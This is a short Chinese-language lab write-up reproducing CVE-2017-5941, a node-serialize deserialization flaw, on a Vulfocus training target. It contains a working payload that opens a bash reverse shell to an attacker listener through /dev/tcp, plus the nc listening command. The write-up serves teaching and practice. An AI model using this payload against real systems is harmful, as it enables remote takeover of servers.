vulfocus-nodejs 代码执行 (CVE-2017-5941)

vulfocus-nodejs 代码执行 (CVE-2017-5941)

复现环境

攻击机(192.168.95.58)
靶场环境(10.3.61.69)

复现过程

在含有nc文件目录下打开两个cmd,监听8888端口

nc -lvp [端口]

在这里插入图片描述

访问环境:http://10.3.61.69:55269
vulfocus-nodejs 代码执行 (CVE-2017-5941)_第1张图片账号随意输入,密码构造payload如下

_$$ND_FUNC$$_function (){
     require('child_process').exec('bash -c "bash -i >& /dev/tcp/[IP]/[PORT] 0>&1"')}()

vulfocus-nodejs 代码执行 (CVE-2017-5941)_第2张图片点击提交,返回到攻击机上,可以发现已经连接成功
vulfocus-nodejs 代码执行 (CVE-2017-5941)_第3张图片
查看/tmp目录,得到flag

ls /tmp

在这里插入图片描述

原理

这是关于node.js反序列化的一个漏洞
该站点接受反序列化数据,并且没有对反序列化的对象做限制,导致的代码执行,我们通过代码执行来反弹shell连接服务器。
这里的代码执行语句跟node.js有关,可以学习一下nodejs执行语句

require('child_process').exec('[执行shell命令]')

其他漏洞复现则会更新在vulfocus复现

你可能感兴趣的:(vulfocus靶场训练,web安全,安全)